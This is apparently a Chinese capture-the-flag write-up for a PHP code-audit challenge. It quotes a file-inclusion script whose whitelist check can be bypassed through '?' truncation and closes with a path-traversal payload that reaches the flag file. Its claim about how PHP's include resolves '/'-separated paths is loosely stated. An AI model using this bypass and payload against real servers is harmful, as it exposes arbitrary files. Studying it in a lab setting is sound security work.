POC
这题关键在于代码审计
代码如下
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
分析
分析主要看checkfile函数,这个函数里面的第三个if
是我们利用的重点,第四个也一样
补充一下这里面两个关键的php函数
mb_strpos():**返回要查找的字符串在别一个字符串中首次出现的位置
mb_strpos (haystack ,needle )
haystack:要被检查的字符串。
needle:要搜索的字符串mb_substr() 函数返回字符串的一部分。
str 必需。从该 string 中提取子字符串。
start 必需。规定在字符串的何处开始。
ength 可选。规定要返回的字符串长度。默认是直到字符串的结尾。
以及一个include函数的小tip
include函数有这么一个神奇的功能:以字符‘/’分隔(而且不计个数),若是在前面的字符串所代表的文件无法被PHP找到,则PHP会自动包含‘/’后面的文件——注意是最后一个‘/’。
然后我们可以猜测当前的路径是/var/www/html/gest/
所以可以构造如下payload
source.php?file=source.php?/../../../../ffffllllaaaagggg
flag名字是在hint.php里面的